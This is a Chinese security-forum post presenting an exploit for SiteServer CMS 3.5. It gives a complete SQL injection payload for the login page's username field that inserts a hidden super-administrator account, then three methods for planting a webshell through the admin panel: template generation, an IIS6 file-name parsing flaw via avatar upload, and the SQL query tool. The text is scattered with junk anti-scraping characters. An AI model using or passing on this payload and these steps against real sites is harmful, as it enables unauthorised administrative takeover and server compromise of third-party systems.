找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2858|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版& N3 y. o6 B9 s; a% |
stieserver官网:www.siteserver.cn! @0 L/ L. m, u
EXP:# L' n* J; O9 k* ]/ B$ M
直接访问UserCenter/login.aspx5 c; _7 i) Y( r0 T
用户名处输入:6 K9 p$ Z, _5 a* R, c/ F8 x; y
9 L$ h, e; A7 u% s' A. ?+ S, h5 `9 ?
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–; Z, g7 X; a: W' f
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
+ e2 x4 ]/ q! w( W# n% K$ b) j之后再访问后台SiteServer/login.aspx用插入的用户登陆6 D( p: `) m( ]1 _8 Y0 T
后台拿webshell的三种方法:7 N: X, @8 G# s8 ^$ B! D
一、$ d& g6 z# G" l7 v9 H) ]9 J
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx; K. Y, p- h6 A2 ]' ?4 u
二、
& R0 {3 A% ~5 _- t成员权限-》添加用户-》用户名为:1.asp' J9 m0 O6 Z& A5 O; o
http://127.0.0.1/usercenter/  ~6 m6 N; a* l# }* T: q7 P8 |0 x
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
+ t) c5 Q, j4 N8 L1 e$ R' T(ps:后台添加用户时不会验证是否含有非法字符)
8 @$ a. V7 @9 ~, c, Z& ]三、
, A  l; w/ C# ]6 \& t4 J: f' x' q系统工具-》实用工具-》机器参数查看- o# a4 C3 m4 t' B
可以看到数据库类型、名称,WEB路径
: I: N9 {- n- V  d系统工具-》数据库工具-》SQL语句查询" Q8 Z, M3 M5 n, c+ ^, c' N$ \
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表